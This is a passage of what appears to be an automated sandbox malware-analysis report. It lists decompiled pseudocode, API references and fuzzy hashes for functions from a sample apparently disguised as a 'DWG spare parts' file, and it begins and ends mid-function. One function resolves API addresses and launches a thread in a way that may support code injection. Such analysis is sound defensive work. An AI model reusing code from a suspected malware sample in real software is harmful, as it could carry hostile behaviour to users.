								_t29 = CharNextA(_t23);
								_t35 = _t35 + _t29 - _t23;
								_t23 = _t29;
								continue;
							}
							_t23 = CharNextA(_t23);
							while( *_t23 != 0 &&  *_t23 != 0x22) {
								_t32 = CharNextA(_t23);
								_t35 = _t35 + _t32 - _t23;
								_t23 = _t32;
							}
							if( *_t23 != 0) {
								_t23 = CharNextA(_t23);
							}
						}
						E02514F90(_t33, _t35);
						_t24 =  *_t37;
						_t36 =  *_t33;
						_t34 = 0;
						while( *_t24 > 0x20) {
							if( *_t24 != 0x22) {
								_t30 = CharNextA(_t24);
								if(_t30 <= _t24) {
									continue;
								} else {
									goto L27;
								}
								do {
									L27:
									 *((char*)(_t36 + _t34)) =  *_t24 & 0x000000ff;
									_t24 =  &(_t24[1]);
									_t34 = _t34 + 1;
								} while (_t30 > _t24);
								continue;
							}
							_t24 = CharNextA(_t24);
							while( *_t24 != 0 &&  *_t24 != 0x22) {
								_t31 = CharNextA(_t24);
								if(_t31 <= _t24) {
									continue;
								} else {
									goto L21;
								}
								do {
									L21:
									 *((char*)(_t36 + _t34)) =  *_t24 & 0x000000ff;
									_t24 =  &(_t24[1]);
									_t34 = _t34 + 1;
								} while (_t31 > _t24);
							}
							if( *_t24 != 0) {
								_t24 = CharNextA(_t24);
							}
						}
						return _t24;
					} else {
						_t23 =  &(_t23[2]);
						continue;
					}
				}
			}














                                                                0x02512ecd
                                                                0x02512ecf
                                                                0x00000000
                                                                0x02512edb
                                                                0x02512ede
                                                                0x02512ed9
                                                                0x00000000
                                                                0x02512ed9
                                                                0x02512ee8
                                                                0x02512ef5
                                                                0x02512ef7
                                                                0x02512f44
                                                                0x02512eff
                                                                0x02512f3a
                                                                0x02512f40
                                                                0x02512f42
                                                                0x00000000
                                                                0x02512f42
                                                                0x02512f07
                                                                0x02512f1b
                                                                0x02512f11
                                                                0x02512f17
                                                                0x02512f19
                                                                0x02512f19
                                                                0x02512f28
                                                                0x02512f30
                                                                0x02512f30
                                                                0x02512f28
                                                                0x02512f4d
                                                                0x02512f52
                                                                0x02512f55
                                                                0x02512f57
                                                                0x02512fb5
                                                                0x02512f5e
                                                                0x02512fa2
                                                                0x02512fa6
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x02512fa8
                                                                0x02512fa8
                                                                0x02512fab
                                                                0x02512faf
                                                                0x02512fb0
                                                                0x02512fb1
                                                                0x00000000
                                                                0x02512fa8
                                                                0x02512f66
                                                                0x02512f83
                                                                0x02512f70
                                                                0x02512f74
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x02512f76
                                                                0x02512f76
                                                                0x02512f79
                                                                0x02512f7d
                                                                0x02512f7e
                                                                0x02512f7f
                                                                0x02512f76
                                                                0x02512f90
                                                                0x02512f98
                                                                0x02512f98
                                                                0x02512f90
                                                                0x02512fc1
                                                                0x02512ef0
                                                                0x02512ef0
                                                                0x00000000
                                                                0x02512ef0
                                                                0x02512ee8

                                                                APIs
                                                                • CharNextA.USER32(00000000,?,?,00000000,00000000,?,0251300A,?,?,?,025269CD,ScanBuffer,0252AD5C,ScanString,0252AD5C,OpenSession), ref: 02512F02
                                                                • CharNextA.USER32(00000000,00000000,?,?,00000000,00000000,?,0251300A,?,?,?,025269CD,ScanBuffer,0252AD5C,ScanString,0252AD5C), ref: 02512F0C
                                                                • CharNextA.USER32(00000000,00000000,?,?,00000000,00000000,?,0251300A,?,?,?,025269CD,ScanBuffer,0252AD5C,ScanString,0252AD5C), ref: 02512F2B
                                                                • CharNextA.USER32(00000000,?,?,00000000,00000000,?,0251300A,?,?,?,025269CD,ScanBuffer,0252AD5C,ScanString,0252AD5C,OpenSession), ref: 02512F35
                                                                • CharNextA.USER32(00000000,00000000,?,?,00000000,00000000,?,0251300A,?,?,?,025269CD,ScanBuffer,0252AD5C,ScanString,0252AD5C), ref: 02512F61
                                                                • CharNextA.USER32(00000000,00000000,00000000,?,?,00000000,00000000,?,0251300A,?,?,?,025269CD,ScanBuffer,0252AD5C,ScanString), ref: 02512F6B
                                                                • CharNextA.USER32(00000000,00000000,00000000,?,?,00000000,00000000,?,0251300A,?,?,?,025269CD,ScanBuffer,0252AD5C,ScanString), ref: 02512F93
                                                                • CharNextA.USER32(00000000,00000000,?,?,00000000,00000000,?,0251300A,?,?,?,025269CD,ScanBuffer,0252AD5C,ScanString,0252AD5C), ref: 02512F9D
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.258561577.0000000002511000.00000020.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                • Associated: 00000000.00000002.258558187.0000000002510000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000000.00000002.258580914.000000000252D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2510000_DWG spare parts 455RTMGF Model.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CharNext
                                                                • String ID: $ $ $"$"$"$"$"$"
                                                                • API String ID: 3213498283-3597982963
                                                                • Opcode ID: 0273904c9f9a17f91be703fda1c9f69ed8930e9c670c125e91c15341f9f53dc5
                                                                • Instruction ID: cb6c9253d38261ef6a82ec268c4b0bf38bac2a8a9de48b51c809fe6197380553
                                                                • Opcode Fuzzy Hash: 0273904c9f9a17f91be703fda1c9f69ed8930e9c670c125e91c15341f9f53dc5
                                                                • Instruction Fuzzy Hash: 3E31A79560C3F12EFB322674DCC532ABEC5BB8F250F084DE59946CA247E7A84441C759
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0252411C Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 67libraryloadersynchronizationCOMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 100%
                                                                			E0252411C(void* __eax, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				long _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				_Unknown_base(*)()* _v28;
				_Unknown_base(*)()* _v32;
				char _v36;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t34;
				void* _t35;
				long _t42;
				intOrPtr _t43;

				_t36 = __ecx;
				_v12 = __ecx;
				_v8 = __edx;
				_t34 = __eax;
				_t43 = _a4;
				_t42 = 0;
				_v28 = GetProcAddress(GetModuleHandleA("kernel32.dll"), "GetModuleHandleA");
				_v32 = GetProcAddress(GetModuleHandleA("kernel32.dll"), "GetProcAddress");
				_v36 = GetProcAddress(GetModuleHandleA("kernel32.dll"), "ExitThread");
				if(_t43 != 4) {
					_t36 = _t43;
					_v20 = E02523DAC(_t34, _t43, _v12);
				} else {
					_v20 = _v12;
				}
				_v24 = E02523D14(_t34, _t34, _t36, _v8, _t42, _t43);
				_t35 = E02523DDC(_t34,  &_v36, E025240EC, 0, 0x14);
				if(_t35 != 0) {
					WaitForSingleObject(_t35, 0xffffffff);
					GetExitCodeThread(_t35,  &_v16);
					_t42 = _v16;
				}
				return _t42;
			}



















                                                                0x0252411c
                                                                0x02524125
                                                                0x02524128
                                                                0x0252412b
                                                                0x0252412d
                                                                0x02524130
                                                                0x02524147
                                                                0x0252415f
                                                                0x02524177
                                                                0x0252417d
                                                                0x02524187
                                                                0x02524193
                                                                0x0252417f
                                                                0x02524182
                                                                0x02524182
                                                                0x025241a0
                                                                0x025241b6
                                                                0x025241ba
                                                                0x025241bf
                                                                0x025241c9
                                                                0x025241ce
                                                                0x025241ce
                                                                0x025241d9

                                                                APIs
                                                                • GetModuleHandleA.KERNEL32(kernel32.dll,GetModuleHandleA,0255D33C,?,550A74C0), ref: 0252413C
                                                                • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 02524142
                                                                • GetModuleHandleA.KERNEL32(kernel32.dll,GetProcAddress,00000000,kernel32.dll,GetModuleHandleA,0255D33C,?,550A74C0), ref: 02524154
                                                                • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0252415A
                                                                • GetModuleHandleA.KERNEL32(kernel32.dll,ExitThread,00000000,kernel32.dll,GetProcAddress,00000000,kernel32.dll,GetModuleHandleA,0255D33C,?,550A74C0), ref: 0252416C
                                                                • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 02524172
                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,kernel32.dll,ExitThread,00000000,kernel32.dll,GetProcAddress,00000000,kernel32.dll,GetModuleHandleA,0255D33C,?,550A74C0), ref: 025241BF
                                                                • GetExitCodeThread.KERNEL32(00000000,0255D33C,00000000,000000FF,00000000,kernel32.dll,ExitThread,00000000,kernel32.dll,GetProcAddress,00000000,kernel32.dll,GetModuleHandleA,0255D33C,?,550A74C0), ref: 025241C9
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.258561577.0000000002511000.00000020.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                • Associated: 00000000.00000002.258558187.0000000002510000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000000.00000002.258580914.000000000252D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2510000_DWG spare parts 455RTMGF Model.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AddressHandleModuleProc$CodeExitObjectSingleThreadWait
                                                                • String ID: ExitThread$GetModuleHandleA$GetProcAddress$kernel32.dll
                                                                • API String ID: 3399263034-1503429014
                                                                • Opcode ID: 431f20104eb34f5a2257e90ff4217420a72857788358324adb3900ddeea7e9f9
                                                                • Instruction ID: 5e56ffe8bed209c2d06ad138d1e6bd246238ebf87499b541996d438a1f25ed88
                                                                • Opcode Fuzzy Hash: 431f20104eb34f5a2257e90ff4217420a72857788358324adb3900ddeea7e9f9
                                                                • Instruction Fuzzy Hash: 3F1166B0F0033A7BEB00ABA4CC409AEBBBDFF96310F110565A511B73C1D67499048FA8
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 02512560 Relevance: 17.8, APIs: 1, Strings: 9, Instructions: 254windowCOMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 98%
                                                                			E02512560(void* __eax, void* __fp0) {
				void* _v8;
				char _v110600;
				char _v112644;
				char _v112645;
				signed int _v112652;
				char _v112653;
				char _v112654;
				char _v112660;
				intOrPtr _v112664;
				intOrPtr _v112668;
				intOrPtr _v112672;
				struct HWND__* _v112676;
				signed short* _v112680;
				intOrPtr* _v112684;
				char _v129068;
				char _v131117;
				char _v161836;
				void* _v162091;
				signed char _v162092;
				void* _t73;
				int _t79;
				signed int _t126;
				int _t131;
				intOrPtr _t132;
				char* _t134;
				char* _t135;
				char* _t136;
				char* _t137;
				char* _t138;
				char* _t139;
				char* _t141;
				char* _t142;
				char* _t147;
				char* _t148;
				intOrPtr _t180;
				void* _t182;
				void* _t184;
				void* _t185;
				intOrPtr* _t188;
				intOrPtr* _t189;
				signed int _t194;
				void* _t197;
				void* _t198;
				void* _t211;

				_push(__eax);
				_t73 = 0x27;
				goto L1;
				L12:
				while(_t180 != 0x256a700) {
					_t79 = E02512078(_t180);
					_t131 = _t79;
					__eflags = _t131;
					if(_t131 == 0) {
						L11:
						_t180 =  *((intOrPtr*)(_t180 + 4));
						continue;
					} else {
						goto L4;
					}
					do {
						L4:
						_t194 =  *(_t131 - 4);
						__eflags = _t194 & 0x00000001;
						if((_t194 & 0x00000001) == 0) {
							__eflags = _t194 & 0x00000004;
							if(__eflags == 0) {
								__eflags = _v112652 - 0x1000;
								if(_v112652 < 0x1000) {
									_v112664 = (_t194 & 0xfffffff0) - 4;
									_t126 = E025123BC(_t131);
									__eflags = _t126;
									if(_t126 == 0) {
										_v112645 = 0;
										 *((intOrPtr*)(_t197 + _v112652 * 4 - 0x1f828)) = _v112664;
										_t18 =  &_v112652;
										 *_t18 = _v112652 + 1;
										__eflags =  *_t18;
									}
								}
							} else {
								E02512414(_t131, __eflags, _t197);
							}
						}
						_t79 = E02512054(_t131);
						_t131 = _t79;
						__eflags = _t131;
					} while (_t131 != 0);
					goto L11;
				}
				_t132 =  *0x256c7a8; // 0x7ef90000
				while(_t132 != 0x256c7a4 && _v112652 < 0x1000) {
					_t79 = E025123BC(_t132 + 0x10);
					__eflags = _t79;
					if(_t79 == 0) {
						_v112645 = 0;
						_t22 = _t132 + 0xc; // 0x80004
						_t79 = _v112652;
						 *((intOrPtr*)(_t197 + _t79 * 4 - 0x1f828)) = ( *_t22 & 0xfffffff0) - 0xfffffffffffffff4;
						_t27 =  &_v112652;
						 *_t27 = _v112652 + 1;
						__eflags =  *_t27;
					}
					_t29 = _t132 + 4; // 0x7f010000
					_t132 =  *_t29;
				}
				if(_v112645 != 0) {
					L48:
					return _t79;
				}
				_v112653 = 0;
				_v112668 = 0;
				_t134 = E02512210(0x28,  &_v161836);
				_v112660 = 0x37;
				_v112680 = 0x252d046;
				_v112684 =  &_v110600;
				do {
					_v112672 = ( *_v112680 & 0x0000ffff) - 4;
					_v112654 = 0;
					_t182 = 0xff;
					_t188 = _v112684;
					while(_t134 <=  &_v131117) {
						if( *_t188 > 0) {
							if(_v112653 == 0) {
								_t134 = E02512210(0x27, _t134);
								_v112653 = 1;
							}
							if(_v112654 != 0) {
								 *_t134 = 0x2c;
								_t139 = _t134 + 1;
								 *_t139 = 0x20;
								_t140 = _t139 + 1;
								__eflags = _t139 + 1;
							} else {
								 *_t134 = 0xd;
								 *((char*)(_t134 + 1)) = 0xa;
								_t147 = E025120F4(_v112668 + 1, _t134 + 2);
								 *_t147 = 0x20;
								_t148 = _t147 + 1;
								 *_t148 = 0x2d;
								 *((char*)(_t148 + 1)) = 0x20;
								_t140 = E02512210(8, E025120F4(_v112672, _t148 + 2));
								_v112654 = 1;
							}
							_t211 = _t182 - 1;
							if(_t211 < 0) {
								_t141 = E02512210(7, _t140);
							} else {
								if(_t211 == 0) {
									_t141 = E02512210(6, _t140);
								} else {
									E02513BD8( *((intOrPtr*)(_t188 - 4)),  &_v162092);
									_t141 = E02512210(_v162092 & 0x000000ff, _t140);
								}
							}
							 *_t141 = 0x20;
							_t142 = _t141 + 1;
							 *_t142 = 0x78;
							 *((char*)(_t142 + 1)) = 0x20;
							_t134 = E025120F4( *_t188, _t142 + 2);
						}
						_t182 = _t182 - 1;
						_t188 = _t188 - 8;
						if(_t182 != 0xffffffff) {
							continue;
						} else {
							goto L37;
						}
					}
					L37:
					_v112668 = _v112672;
					_v112684 = _v112684 + 0x800;
					_v112680 =  &(_v112680[0x10]);
					_t60 =  &_v112660;
					 *_t60 = _v112660 - 1;
				} while ( *_t60 != 0);
				if(_v112652 <= 0) {
					L47:
					E02512210(3, _t134);
					_t79 = MessageBoxA(0,  &_v161836, "Unexpected Memory Leak", 0x2010);
					goto L48;
				}
				if(_v112653 != 0) {
					 *_t134 = 0xd;
					_t136 = _t134 + 1;
					 *_t136 = 0xa;
					_t137 = _t136 + 1;
					 *_t137 = 0xd;
					_t138 = _t137 + 1;
					 *_t138 = 0xa;
					_t134 = _t138 + 1;
				}
				_t134 = E02512210(0x3c, _t134);
				_t184 = _v112652 - 1;
				if(_t184 >= 0) {
					_t185 = _t184 + 1;
					_v112676 = 0;
					_t189 =  &_v129068;
					L43:
					L43:
					if(_v112676 != 0) {
						 *_t134 = 0x2c;
						_t135 = _t134 + 1;
						 *_t135 = 0x20;
						_t134 = _t135 + 1;
					}
					_t134 = E025120F4( *_t189, _t134);
					if(_t134 >  &_v131117) {
						goto L47;
					}
					_v112676 =  &(_v112676->i);
					_t189 = _t189 + 4;
					_t185 = _t185 - 1;
					if(_t185 != 0) {
						goto L43;
					}
				}
				L1:
				_t198 = _t198 + 0xfffff004;
				_push(_t73);
				_t73 = _t73 - 1;
				if(_t73 != 0) {
					goto L1;
				} else {
					E02513518( &_v112644, 0x1b800);
					E02513518( &_v129068, 0x4000);
					_t79 = 0;
					_v112652 = 0;
					_v112645 = 1;
					_t180 =  *0x256a704; // 0x2920000
					goto L12;
				}
			}















































                                                                0x02512563
                                                                0x02512564
                                                                0x02512564
                                                                0x00000000
                                                                0x0251263f
                                                                0x025125bf
                                                                0x025125c4
                                                                0x025125c6
                                                                0x025125c8
                                                                0x0251263c
                                                                0x0251263c
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x025125ca
                                                                0x025125ca
                                                                0x025125cf
                                                                0x025125d1
                                                                0x025125d7
                                                                0x025125d9
                                                                0x025125df
                                                                0x025125ec
                                                                0x025125f6
                                                                0x025125fe
                                                                0x02512606
                                                                0x0251260b
                                                                0x0251260d
                                                                0x0251260f
                                                                0x02512622
                                                                0x02512629
                                                                0x02512629
                                                                0x02512629
                                                                0x02512629
                                                                0x0251260d
                                                                0x025125e1
                                                                0x025125e4
                                                                0x025125e9
                                                                0x025125df
                                                                0x02512631
                                                                0x02512636
                                                                0x02512638
                                                                0x02512638
                                                                0x00000000
                                                                0x025125ca
                                                                0x0251264b
                                                                0x0251268a
                                                                0x02512658
                                                                0x0251265d
                                                                0x0251265f
                                                                0x02512661
                                                                0x02512668
                                                                0x02512674
                                                                0x0251267a
                                                                0x02512681
                                                                0x02512681
                                                                0x02512681
                                                                0x02512681
                                                                0x02512687
                                                                0x02512687
                                                                0x02512687
                                                                0x025126a5
                                                                0x02512903
                                                                0x02512909
                                                                0x02512909
                                                                0x025126ab
                                                                0x025126b4
                                                                0x025126cf
                                                                0x025126d1
                                                                0x025126db
                                                                0x025126eb
                                                                0x025126f1
                                                                0x025126fd
                                                                0x02512703
                                                                0x0251270a
                                                                0x02512715
                                                                0x02512717
                                                                0x02512728
                                                                0x02512735
                                                                0x02512748
                                                                0x0251274a
                                                                0x0251274a
                                                                0x02512758
                                                                0x025127a9
                                                                0x025127ac
                                                                0x025127ad
                                                                0x025127b0
                                                                0x025127b0
                                                                0x0251275a
                                                                0x0251275a
                                                                0x0251275e
                                                                0x02512770
                                                                0x02512772
                                                                0x02512775
                                                                0x02512776
                                                                0x0251277a
                                                                0x0251279e
                                                                0x025127a0
                                                                0x025127a0
                                                                0x025127b3
                                                                0x025127b6
                                                                0x025127cd
                                                                0x025127b8
                                                                0x025127b8
                                                                0x025127e2
                                                                0x025127ba
                                                                0x025127ef
                                                                0x02512808
                                                                0x02512808
                                                                0x025127b8
                                                                0x0251280a
                                                                0x0251280d
                                                                0x0251280e
                                                                0x02512812
                                                                0x0251281f
                                                                0x0251281f
                                                                0x02512821
                                                                0x02512822
                                                                0x02512828
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x02512828
                                                                0x0251282e
                                                                0x02512834
                                                                0x0251283a
                                                                0x02512844
                                                                0x0251284b
                                                                0x0251284b
                                                                0x0251284b
                                                                0x0251285e
                                                                0x025128da
                                                                0x025128e6
                                                                0x025128fe
                                                                0x00000000
                                                                0x025128fe
                                                                0x02512867
                                                                0x02512869
                                                                0x0251286c
                                                                0x0251286d
                                                                0x02512870
                                                                0x02512871
                                                                0x02512874
                                                                0x02512875
                                                                0x02512878
                                                                0x02512878
                                                                0x0251288a
                                                                0x02512892
                                                                0x02512895
                                                                0x02512897
                                                                0x02512898
                                                                0x025128a2
                                                                0x00000000
                                                                0x025128a8
                                                                0x025128af
                                                                0x025128b1
                                                                0x025128b4
                                                                0x025128b5
                                                                0x025128b8
                                                                0x025128b8
                                                                0x025128c2
                                                                0x025128cc
                                                                0x00000000
                                                                0x00000000
                                                                0x025128ce
                                                                0x025128d4
                                                                0x025128d7
                                                                0x025128d8
                                                                0x00000000
                                                                0x00000000
                                                                0x025128d8
                                                                0x02512569
                                                                0x02512569
                                                                0x0251256f
                                                                0x02512570
                                                                0x02512571
                                                                0x00000000
                                                                0x02512573
                                                                0x0251258c
                                                                0x0251259e
                                                                0x025125a3
                                                                0x025125a5
                                                                0x025125ab
                                                                0x025125b2
                                                                0x00000000
                                                                0x025125b2

                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.258561577.0000000002511000.00000020.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                • Associated: 00000000.00000002.258558187.0000000002510000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000000.00000002.258580914.000000000252D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2510000_DWG spare parts 455RTMGF Model.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Message
                                                                • String ID: $ bytes: $7$An unexpected memory leak has occurred. $String$The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak$Unknown
                                                                • API String ID: 2030045667-32948583
                                                                • Opcode ID: b0de788393eef4e35d9d779b73aca904dc55b2c3fa65bfe2821b564bdab05f47
                                                                • Instruction ID: 9ece151a485df265e3db3594c76b13b0f432830787bda24abd7e59ac5f95c48e
                                                                • Opcode Fuzzy Hash: b0de788393eef4e35d9d779b73aca904dc55b2c3fa65bfe2821b564bdab05f47
                                                                • Instruction Fuzzy Hash: 81A1D430A042B88BFF21AA2CC884BD9BAE5FB49710F1441E5DC49DB286DB7589C5CF59
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 02513154 Relevance: 15.1, APIs: 10, Instructions: 129fileCOMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 80%
                                                                			E02513154(void** __eax) {
				long _t29;
				void* _t31;
				long _t34;
				void* _t38;
				void* _t40;
				long _t41;
				int _t44;
				void* _t46;
				long _t54;
				long _t55;
				void* _t58;
				void** _t59;
				DWORD* _t60;

				_t59 = __eax;
				 *((intOrPtr*)(__eax + 0xc)) = 0;
				 *((intOrPtr*)(__eax + 0x10)) = 0;
				if(0xffffffffffff284f == 0) {
					_t29 = 0x80000000;
					_t55 = 1;
					_t54 = 3;
					 *((intOrPtr*)(__eax + 0x1c)) = 0x25130a8;
				} else {
					if(0xffffffffffff284f == 0) {
						_t29 = 0x40000000;
						_t55 = 1;
						_t54 = 2;
					} else {
						if(0xffffffffffff284f != 0) {
							return 0xffffffffffff284d;
						}
						_t29 = 0xc0000000;
						_t55 = 1;
						_t54 = 3;
					}
					_t59[7] = E025130E8;
				}
				_t59[9] = E02513134;
				_t59[8] = E025130E4;
				if(_t59[0x12] == 0) {
					_t59[2] = 0x80;
					_t59[9] = E025130E4;
					_t59[5] =  &(_t59[0x53]);
					if(_t59[1] == 0xd7b2) {
						if(_t59 != 0x256a3e0) {
							_t31 = GetStdHandle(0xfffffff5);
						} else {
							_t31 = GetStdHandle(0xfffffff4);
						}
					} else {
						_t31 = GetStdHandle(0xfffffff6);
					}
					if(_t31 == 0xffffffff) {
						goto L37;
					}
					 *_t59 = _t31;
					goto L30;
				} else {
					_t38 = CreateFileA( &(_t59[0x12]), _t29, _t55, 0, _t54, 0x80, 0);
					if(_t38 == 0xffffffff) {
						L37:
						_t59[1] = 0xd7b0;
						return GetLastError();
					}
					 *_t59 = _t38;
					if(_t59[1] != 0xd7b3) {
						L30:
						if(_t59[1] == 0xd7b1) {
							L34:
							return 0;
						}
						_t34 = GetFileType( *_t59);
						if(_t34 == 0) {
							CloseHandle( *_t59);
							_t59[1] = 0xd7b0;
							return 0x69;
						}
						if(_t34 == 2) {
							_t59[8] = E025130E8;
						}
						goto L34;
					}
					_t59[1] = _t59[1] - 1;
					_t40 = GetFileSize( *_t59, 0) + 1;
					if(_t40 == 0) {
						goto L37;
					}
					_t41 = _t40 - 0x81;
					if(_t41 < 0) {
						_t41 = 0;
					}
					if(SetFilePointer( *_t59, _t41, 0, 0) + 1 == 0) {
						goto L37;
					} else {
						_t44 = ReadFile( *_t59,  &(_t59[0x53]), 0x80, _t60, 0);
						_t58 = 0;
						if(_t44 != 1) {
							goto L37;
						}
						_t46 = 0;
						while(_t46 < _t58) {
							if( *((char*)(_t59 + _t46 + 0x14c)) == 0xe) {
								if(SetFilePointer( *_t59, _t46 - _t58, 0, 2) + 1 == 0 || SetEndOfFile( *_t59) != 1) {
									goto L37;
								} else {
									goto L30;
								}
							}
							_t46 = _t46 + 1;
						}
						goto L30;
					}
				}
			}
















                                                                0x02513155
                                                                0x02513159
                                                                0x0251315c
                                                                0x02513168
                                                                0x02513175
                                                                0x0251317a
                                                                0x0251317f
                                                                0x02513184
                                                                0x0251316a
                                                                0x0251316b
                                                                0x0251318d
                                                                0x02513192
                                                                0x02513197
                                                                0x0251316d
                                                                0x0251316e
                                                                0x00000000
                                                                0x00000000
                                                                0x0251319e
                                                                0x025131a3
                                                                0x025131a8
                                                                0x025131a8
                                                                0x025131ad
                                                                0x025131ad
                                                                0x025131b4
                                                                0x025131bb
                                                                0x025131c6
                                                                0x02513284
                                                                0x0251328b
                                                                0x02513292
                                                                0x0251329b
                                                                0x025132a7
                                                                0x025132af
                                                                0x025132a9
                                                                0x025132af
                                                                0x025132af
                                                                0x0251329d
                                                                0x025132af
                                                                0x025132af
                                                                0x025132b7
                                                                0x00000000
                                                                0x00000000
                                                                0x025132b9
                                                                0x00000000
                                                                0x025131cc
                                                                0x025131dc
                                                                0x025131e4
                                                                0x025132f2
                                                                0x025132f2
                                                                0x00000000
                                                                0x025132f8
                                                                0x025131ea
                                                                0x025131f2
                                                                0x025132bb
                                                                0x025132c1
                                                                0x025132da
                                                                0x00000000
                                                                0x025132da
                                                                0x025132c5
                                                                0x025132cc
                                                                0x025132e0
                                                                0x025132e5
                                                                0x00000000
                                                                0x025132eb
                                                                0x025132d1
                                                                0x025132d3
                                                                0x025132d3
                                                                0x00000000
                                                                0x025132d1
                                                                0x025131f8
                                                                0x02513205
                                                                0x02513206
                                                                0x00000000
                                                                0x00000000
                                                                0x0251320c
                                                                0x02513211
                                                                0x02513213
                                                                0x02513213
                                                                0x02513222
                                                                0x00000000
                                                                0x02513228
                                                                0x0251323d
                                                                0x02513242
                                                                0x02513244
                                                                0x00000000
                                                                0x00000000
                                                                0x0251324a
                                                                0x0251324c
                                                                0x02513258
                                                                0x0251326c
                                                                0x00000000
                                                                0x0251327c
                                                                0x00000000
                                                                0x0251327c
                                                                0x0251326c
                                                                0x0251325a
                                                                0x0251325a
                                                                0x00000000
                                                                0x0251324c
                                                                0x02513222

                                                                APIs
                                                                • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 025131DC
                                                                • GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 02513200
                                                                • SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0251321C
                                                                • ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000001,00000000), ref: 0251323D
                                                                • SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 02513266
                                                                • SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 02513274
                                                                • GetStdHandle.KERNEL32(000000F5), ref: 025132AF
                                                                • GetFileType.KERNEL32(?,000000F5), ref: 025132C5
                                                                • CloseHandle.KERNEL32(?,?,000000F5), ref: 025132E0
                                                                • GetLastError.KERNEL32(000000F5), ref: 025132F8
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.258561577.0000000002511000.00000020.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                • Associated: 00000000.00000002.258558187.0000000002510000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000000.00000002.258580914.000000000252D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2510000_DWG spare parts 455RTMGF Model.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: File$HandlePointer$CloseCreateErrorLastReadSizeType
                                                                • String ID:
                                                                • API String ID: 1694776339-0
                                                                • Opcode ID: fe27e3dc42b1b987ff18d1063b063a78db3cb5149674574a0aa667b0d1a18489
                                                                • Instruction ID: 890984a665a1ce467ff0600407490c90cdfb991ebe7bfc3cf6c14302f315b351
                                                                • Opcode Fuzzy Hash: fe27e3dc42b1b987ff18d1063b063a78db3cb5149674574a0aa667b0d1a18489
                                                                • Instruction Fuzzy Hash: F741F130240781BAFB34BF24C924B63B9E5FB41754F20CEA9D1BA865D4D765D444CB4C
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0251255E Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 188COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 98%
                                                                			E0251255E(void* __eax) {
				void* _v8;
				char _v110600;
				char _v112644;
				char _v112645;
				signed int _v112652;
				char _v112653;
				char _v112654;
				char _v112660;
				intOrPtr _v112664;
				intOrPtr _v112668;
				intOrPtr _v112672;
				struct HWND__* _v112676;
				signed short* _v112680;
				intOrPtr* _v112684;
				char _v129068;
				char _v131117;
				char _v161836;
				void* _v162091;
				signed char _v162092;
				void* _t73;
				int _t79;
				signed int _t126;
				int _t131;
				intOrPtr _t132;
				char* _t134;
				char* _t135;
				char* _t136;
				char* _t137;
				char* _t138;
				char* _t139;
				char* _t141;
				char* _t142;
				char* _t147;
				char* _t148;
				intOrPtr _t180;
				void* _t182;
				void* _t184;
				void* _t185;
				intOrPtr* _t188;
				intOrPtr* _t189;
				signed int _t194;
				void* _t198;
				void* _t200;
				void* _t214;

				_t198 = _t200;
				_push(__eax);
				_t73 = 0x27;
				goto L2;
				L13:
				while(_t180 != 0x256a700) {
					_t79 = E02512078(_t180);
					_t131 = _t79;
